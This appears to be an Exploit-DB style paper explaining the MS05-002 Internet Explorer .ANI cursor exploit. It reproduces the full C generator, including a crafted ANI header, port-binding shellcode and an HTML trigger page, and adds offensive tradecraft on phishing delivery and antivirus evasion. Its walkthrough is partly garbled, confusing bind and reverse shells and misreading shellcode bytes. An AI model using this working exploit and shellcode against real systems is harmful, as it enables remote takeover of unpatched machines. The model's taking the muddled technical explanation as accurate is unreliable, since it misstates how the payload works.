By exploitdb papers bot•January 22, 2005•

papers

Microsoft Internet Explorer '.ANI' Universal Exploit (MS05-002) Explained

What this paper is

This paper details a proof-of-concept exploit for a vulnerability in Microsoft Internet Explorer (IE) related to how it handles .ANI (animated cursor) files. The vulnerability, identified as CAN-2004-1049 and addressed by Microsoft's security bulletin MS05-002, allows for remote code execution. An attacker could craft a malicious .ANI file that, when displayed by a user (e.g., via a web page or email), could lead to the execution of arbitrary code on the victim's system. The provided exploit code generates both a malicious .ANI file and an HTML file to trigger the vulnerability, enabling a remote attacker to gain control of the affected system.

Simple technical breakdown

The core of the vulnerability lies in how Internet Explorer parses and renders .ANI files. The exploit leverages a buffer overflow or a similar memory corruption issue within this parsing mechanism. By crafting a specially malformed .ANI file, the attacker can overwrite critical memory regions.

The provided exploit code does two main things:

Creates a malicious .ANI file: This file contains a crafted header followed by shellcode. The header is designed to trigger the vulnerability in IE. The shellcode is the payload that will be executed on the victim's machine.
Creates an HTML file: This HTML file is designed to load the malicious .ANI file as the cursor for the web page. When IE attempts to load this cursor, it processes the malformed .ANI file, leading to the execution of the embedded shellcode.

The shellcode in this specific exploit is a port-binding reverse shell. This means it will listen on a specified port on the victim's machine and, when a connection is made to that port, it will provide a command shell.

Complete code and payload walkthrough

The provided C code is a tool to generate the exploit files. Let's break down its components:

Code Fragments and their Practical Purposes

#include <stdio.h>, #include <stdlib.h>, #include <string.h>: Standard C library includes for input/output, general utilities, and string manipulation.
- Practical Purpose: Essential for the program to function, allowing file operations, memory allocation, and string handling.
unsigned char aniheader[] = "...": This array holds the raw bytes representing the beginning of a malformed .ANI file. It's designed to exploit a flaw in IE's .ANI parsing.
- Practical Purpose: This is the core of the exploit's trigger. It contains specific byte sequences that cause memory corruption when processed by the vulnerable IE component. The RIFF and ACON signatures are typical for RIFF-based file formats, but the subsequent data is malformed. The repeated \x77\x82\x40\x00\xeb\x64\x90\x90 sequences and \x90 (NOPs) are likely part of the overflow and shellcode padding/landing zone.
unsigned char shellcode[] = "...": This array contains the machine code (shellcode) that will be executed on the target system. This specific shellcode is designed to create a reverse TCP shell that binds to a specified port.
- Practical Purpose: This is the payload. It's a sequence of bytes that, when executed, performs a specific action. In this case, it's a port-binding shell.
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port): A macro to easily set the port number within the shellcode byte array at a specific offset (300 bytes into the shellcode).
- Practical Purpose: Allows for easy configuration of the shellcode's listening port without manually editing the byte array. The port is stored as a 16-bit unsigned short.
unsigned char discl[] = "...": A string containing a disclaimer about the educational purpose of the code.
- Practical Purpose: Standard disclaimer for security research tools.
unsigned char html[] = "...": A template for the HTML file. It includes JavaScript to display an alert message and CSS to set the cursor to the generated .ANI file.
- Practical Purpose: This HTML file is the delivery mechanism. When opened in IE, it instructs the browser to use the crafted .ANI file as the cursor, triggering the exploit. The %s placeholders are for the disclaimer and the base filename of the .ANI file.
unsigned short fixx(unsigned short p): A function to swap the byte order of a 16-bit unsigned short (endianness conversion). This is necessary because network byte order (big-endian) might differ from the system's native byte order (little-endian).
- Practical Purpose: Ensures the port number is correctly formatted for network communication, regardless of the system's endianness.
void usage(char *prog): A function to print usage instructions if the program is not called with the correct arguments.
- Practical Purpose: Provides user guidance on how to run the exploit generator.
int main(int argc, char **argv): The main function of the program.
- printf(...): Prints introductory messages and information about the exploit.
  - Practical Purpose: Informs the user about the exploit's capabilities and tested platforms.
- if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ): Checks if the shellcode is too large to fit into the allocated space in the .ANI file after the header and some padding.
  - Practical Purpose: Prevents buffer overflows within the exploit generator itself and ensures the shellcode can be placed within the .ANI file's structure. The 912 is likely the total size of the buffer allocated for the .ANI file. sizeof(aniheader)-1 is the size of the header bytes. -3 is for potential padding or other data.
- if (argc < 3) usage(argv[0]);: Checks if the correct number of command-line arguments (filename base and port) are provided.
  - Practical Purpose: Ensures the program receives the necessary input to generate the exploit files.
- if (strlen(argv[1]) > 256): Checks if the provided filename base is too long.
  - Practical Purpose: Prevents buffer overflows when constructing filenames.
- strcpy(f, argv[1]); strcat(f, ".ani");: Constructs the .ani filename.
  - Practical Purpose: Creates the output filename for the malicious cursor file.
- fp = fopen(f, "wb");: Opens the .ani file in binary write mode.
  - Practical Purpose: Prepares to write the binary exploit data to a file.
- memset(anib, 0x90, 912);: Initializes a buffer (anib) of 912 bytes with NOP (No Operation) instructions.
  - Practical Purpose: This buffer will hold the complete .ANI file content. Initializing with NOPs provides a safe landing zone for the shellcode and can help with overflow exploitation.
- memcpy(anib, aniheader, sizeof(aniheader)-1);: Copies the crafted .ANI header into the buffer.
  - Practical Purpose: Places the exploit trigger at the beginning of the .ANI file.
- port = atoi(argv[2]); SET_PORTBIND_PORT(shellcode, fixx(port));: Converts the command-line port argument to an integer and then uses the macro to embed the correctly byte-swapped port into the shellcode byte array.
  - Practical Purpose: Configures the shellcode to listen on the desired port.
- memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);: Copies the shellcode into the anib buffer immediately after the header.
  - Practical Purpose: Places the executable payload after the exploit trigger. The offset sizeof(aniheader)-1 is crucial.
- fwrite(anib, 1, 912, fp);: Writes the entire 912-byte buffer (header + shellcode + padding) to the .ani file.
  - Practical Purpose: Creates the final malicious .ANI file.
- f[0] = '\0'; strcpy(f, argv[1]); strcat(f, ".html");: Constructs the .html filename.
  - Practical Purpose: Creates the output filename for the HTML delivery file.
- fp = fopen(f, "wb");: Opens the .html file in binary write mode.
  - Practical Purpose: Prepares to write the HTML content.
- sprintf(anib, html, discl, argv[1]);: Formats the HTML template, inserting the disclaimer and the base filename of the .ANI file.
  - Practical Purpose: Creates the HTML content that will embed the malicious .ANI file.
- fwrite(anib, 1, strlen(anib), fp);: Writes the generated HTML content to the .html file.
  - Practical Purpose: Creates the final HTML delivery file.

Shellcode Breakdown (Port-Binding Reverse Shell)

The shellcode array is a sequence of x86 assembly instructions. Without a disassembler, a precise line-by-line analysis is difficult, but we can infer its general purpose from common shellcode patterns and the context. This specific shellcode aims to:

Locate necessary Windows API functions: It likely uses techniques like iterating through loaded modules (e.g., kernel32.dll, ws2_32.dll) and their export tables to find the addresses of functions like socket, connect, CreateProcess, WSASocket, bind, listen, accept, etc.
Initialize Winsock: It will call WSAStartup to prepare for network operations.
Create a socket: It will call socket() to create a TCP socket.
Bind to a port: It will call bind() to associate the socket with a specific IP address (usually INADDR_ANY) and the port specified by SET_PORTBIND_PORT.
Listen for connections: It will call listen() to put the socket into listening mode.
Accept a connection: It will call accept() to wait for and establish a connection from a client.
Duplicate file descriptors: Once a connection is accepted, it will duplicate the socket's file descriptor to standard input (stdin), standard output (stdout), and standard error (stderr). This is a common technique to redirect program I/O to the network socket.
Execute a command shell: Finally, it will likely call CreateProcess() or a similar function to launch cmd.exe (the Windows command prompt), with its I/O redirected to the duplicated socket.

Shellcode Segment -> Practical Purpose
- \xeb\x70\x56\x33\xc0...: Entry point and initial setup. Likely involves setting up registers and preparing for API resolution.
- ...8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3: This section is highly indicative of API resolution. It's common for shellcode to walk the PEB (Process Environment Block) and export tables to find function addresses dynamically.
- \x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3: This large block is likely the core of the API resolution and Winsock initialization. It involves stack manipulation (pusha, popa), PEB traversal, and potentially string comparisons to find function names.
- \xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3: This part might be related to socket creation and binding. The \xe8 is a relative call, suggesting a jump to another part of the shellcode.
- \x8e\x4e\x0e\xec\x72\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14: This is a very large section. It's highly probable that this contains the logic for bind, listen, accept, and the subsequent redirection of stdin/stdout/stderr to the accepted socket. The \xb8\x01\x63\x6d\x64\x64 sequence is a strong indicator of cmd.exe being launched.
- \x8b\xf0\x33\xc0\x33\db\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x28\xff\x55\x0c: This final large block likely contains the cleanup, exit routines, and potentially the actual CreateProcess call with I/O redirection. The \xf7\xd0 could be a call to CreateProcess or a related function.

Practical details for offensive operations teams

Required Access Level: No local access is required. This is a remote code execution vulnerability. The attacker only needs to deliver the malicious .ANI file to the target user.
Lab Preconditions:
- A vulnerable version of Internet Explorer installed on the target system (e.g., IE 5.0 to IE 6 SP1, depending on the specific patch level).
- The target user must be tricked into opening the .html file, or the .ANI file must be placed in a location that IE will automatically process (e.g., a website, an email attachment).
- A listener on the attacker's machine is required to connect to the victim's port once the shellcode executes.
Tooling Assumptions:
- The provided C code needs to be compiled on a system with a C compiler (e.g., Visual Studio on Windows, GCC on Linux/Cygwin).
- A web server is needed to host the .html file if the attack vector is via a malicious website.
- A network listener (e.g., netcat, socat) is needed on the attacker's machine to receive the incoming shell connection.
Execution Pitfalls:
- Antivirus/IDS: Modern security solutions are highly likely to detect the shellcode or the .ANI file signature. Evasion techniques would be necessary.
- IE Version: The exploit is specific to certain versions of Internet Explorer. Targeting systems with patched IE versions will not be successful.
- User Interaction: The user must be convinced to open the .html file or view the malicious content. Social engineering is a critical component.
- Firewall Rules: Network firewalls on the target's network might block the outgoing connection from the victim to the attacker's listener.
- Shellcode Size Limit: The exploit has a fixed buffer size for the .ANI file. If the shellcode is too large, it won't fit, and the exploit will fail. The code includes a check for this.
- Port Conflicts: If the chosen bindport is already in use on the victim machine, the shellcode might fail to bind.
Tradecraft Considerations:
- Delivery: The most challenging aspect is delivering the .html file. This could be via phishing emails, malicious websites, or compromised legitimate sites.
- Obfuscation: The .ANI file and the shellcode would likely need obfuscation to bypass signature-based detection.
- Payload Customization: The provided shellcode is a port-binding shell. For stealthier operations, a reverse shell that connects out to the attacker might be preferred, or a more advanced payload.
- File Naming: The .ani and .html extensions are standard. Renaming them or using alternative delivery methods (e.g., embedding in other file types if possible) could be considered.
Likely Failure Points:
- Patching: The target system has applied MS05-002 or a later cumulative security update.
- Antivirus/Endpoint Protection: The exploit file or shellcode is detected and blocked.
- User Refusal: The user does not open the malicious file.
- Network Restrictions: Firewalls prevent the shell from connecting back.
- Incorrect IE Version: The target is using a different, non-vulnerable version of IE.

Where this was used and when

This exploit targets a vulnerability that was publicly disclosed and patched in early 2005.

Approximate Year: 2005.
Context: Exploits like this were common in the early to mid-2000s as attackers sought to leverage browser vulnerabilities for widespread compromise. The .ANI file format was a less common vector than JavaScript exploits, making it potentially more effective against less sophisticated defenses at the time. It's likely that this exploit, or similar ones targeting the same vulnerability, was used by various threat actors for initial access.

Defensive lessons for modern teams

Patch Management: The most critical lesson is the importance of timely security patching. MS05-002 was a significant vulnerability, and systems that remained unpatched were highly susceptible.
Browser Security: Modern browsers have significantly improved their security models, including sandboxing, memory safety features, and more robust parsing of file formats. However, vulnerabilities can still emerge.
File Format Parsing: Security teams should be aware that complex file formats (images, documents, archives, multimedia) are often sources of vulnerabilities. Robust parsing and sanitization are crucial.
Endpoint Detection and Response (EDR): EDR solutions are vital for detecting malicious shellcode execution, even if the initial exploit vector is bypassed. Behavioral analysis can flag suspicious API calls or network connections.
Network Monitoring: Monitoring for unusual outbound connections on unexpected ports can help detect reverse shells.
User Education: Phishing and social engineering remain effective. Educating users about the dangers of opening unsolicited attachments or clicking suspicious links is paramount.
Least Privilege: Running applications, including browsers, with the least privilege necessary can limit the impact of a successful exploit.

ASCII visual (if applicable)

This exploit involves a client-side interaction and a network connection. A simple visual representation of the flow:

+-----------------+      +-----------------+      +-----------------+
| Attacker Machine|----->| Target Machine  |----->| Attacker Machine|
| (Web Server/    |      | (Victim w/ IE)  |      | (Listener)      |
| Listener)       |      +-----------------+      +-----------------+
+-----------------+              |
        ^                        | (User opens .html)
        |                        |
        | (Shell Connection)     v
        |                  +-----------------+
        |                  | IE Parses .ANI  |
        |                  | (Vulnerability) |
        |                  +-----------------+
        |                          |
        |                          v
        |                  +-----------------+
        |                  | Shellcode Runs  |
        |                  | (Bind Shell)    |
        |                  +-----------------+
        |                          |
        +--------------------------+ (Connects back to listener)

Explanation:

The attacker hosts a malicious .html file on a web server.
The victim, using a vulnerable version of Internet Explorer, visits the attacker's web page.
The .html file instructs IE to use a malicious .ANI file as the cursor.
IE attempts to load and parse the .ANI file.
The malformed .ANI file triggers a vulnerability in IE's parsing logic, leading to memory corruption.
The embedded shellcode within the .ANI file is executed.
The shellcode creates a listening socket on the victim machine (port binding).
The attacker's listener connects to the victim's machine on the specified port.
A command shell is provided to the attacker.

Source references

Exploit-DB Paper: https://www.exploit-db.com/papers/765
Microsoft Security Bulletin MS05-002: https://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx (Note: This link might be outdated, but it points to the official patch information).
CAN-2004-1049: Common Vulnerabilities and Exposures identifier for this vulnerability.

Original Exploit-DB Content (Verbatim)

/* Added string.h /str0ke */
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 houseofdabus.
 *
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
 * (CAN-2004-1049)
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * (universal -- for all affected systems)
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution vulnerability exists in the way that
 *    cursor, animated cursor, and icon formats are handled. An attacker
 *    could try to exploit the vulnerability by constructing a malicious
 *    cursor or icon file that could potentially allow remote code
 *    execution if a user visited a malicious Web site or viewed a
 *    malicious e-mail message. An attacker who successfully exploited
 *    this vulnerability could take complete control of an affected
 *    system.
 *
 * ---------------------------------------------------------------------
 * Patch:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows Server 2003
 *    - Windows XP SP1
 *    - Windows XP SP0
 *    - Windows 2000 SP4
 *    - Windows 2000 SP3
 *    - Windows 2000 SP2
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Linux       : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05002-ani-expl.exe poc 7777
 * <...>
 * [*] Creating poc.ani file ... Ok
 * [*] Creating poc.html file ... Ok
 *
 * C:\>
 *
 * start IE -> C:\poc.html
 *
 * C:\>telnet localhost 7777
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\Documents and Settings\Administrator\Desktop>
 *
 * ---------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ANI header */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


/* portbind shellcode */
unsigned char shellcode[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";

#define SET_PORTBIND_PORT(buf, port)	*(unsigned short *)(((buf)+300)) = (port)

unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";

unsigned char html[] =
"<html>\n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
"<br>Copyright (c) 2004-2005 .: houseofdabus :.<br><a href =\""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">"
"Patch (MS05-002)</a>\n"
"<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
"</html>";


unsigned short
fixx(unsigned short p)
{
	unsigned short r = 0;
	r  = (p & 0xFF00) >> 8;
	r |= (p & 0x00FF) << 8;

return r;
}

void
usage(char *prog)
{
	printf("Usage:\n");
	printf("%s <file> <bindport>\n\n", prog);
	exit(0);
}


int
main(int argc, char **argv)
{
	FILE *fp;
	unsigned short port;
	unsigned char f[256+5] = "";
	unsigned char anib[912] = "";


	printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
	printf("\tCopyright (c) 2004-2005 .: houseofdabus :.\n\n\n");
	printf("Tested on all affected systems:\n");
	printf("   [+] Windows Server 2003\n   [+] Windows XP SP1, SP0\n");
	printf("   [+] Windows 2000 All SP\n\n");

	printf("%s\n\n", discl);
	if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
		printf("[-] Size of shellcode must be <= 686 bytes\n");
		return 0;
	}
	if (argc < 3) usage(argv[0]);

	if (strlen(argv[1]) > 256) {
		printf("[-] Size of filename must be <=256 bytes\n");
		return 0;
	}

	/* creating ani file */
	strcpy(f, argv[1]);
	strcat(f, ".ani");
	printf("[*] Creating %s file ...", f);
	fp = fopen(f, "wb");
	if (fp == NULL) {
		printf("\n[-] error: can\'t create file: %s\n", f);
		return 0;
	}
	memset(anib, 0x90, 912);

	/* header */
	memcpy(anib, aniheader, sizeof(aniheader)-1);
	/* shellcode */
	port = atoi(argv[2]);
	SET_PORTBIND_PORT(shellcode, fixx(port));
	memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);

	fwrite(anib, 1, 912, fp);
	printf(" Ok\n");
	fclose(fp);

	/* creating html file */
	f[0] = '\0';
	strcpy(f, argv[1]);
	strcat(f, ".html");
	printf("[*] Creating %s file ...", f);
	fp = fopen(f, "wb");
	if (fp == NULL) {
		printf("\n[-] error: can\'t create file: %s\n", f);
		return 0;
	}
	sprintf(anib, html, discl, argv[1]);
	fwrite(anib, 1, strlen(anib), fp);
	printf(" Ok\n");
	fclose(fp);

return 0;
}

// milw0rm.com [2005-01-22]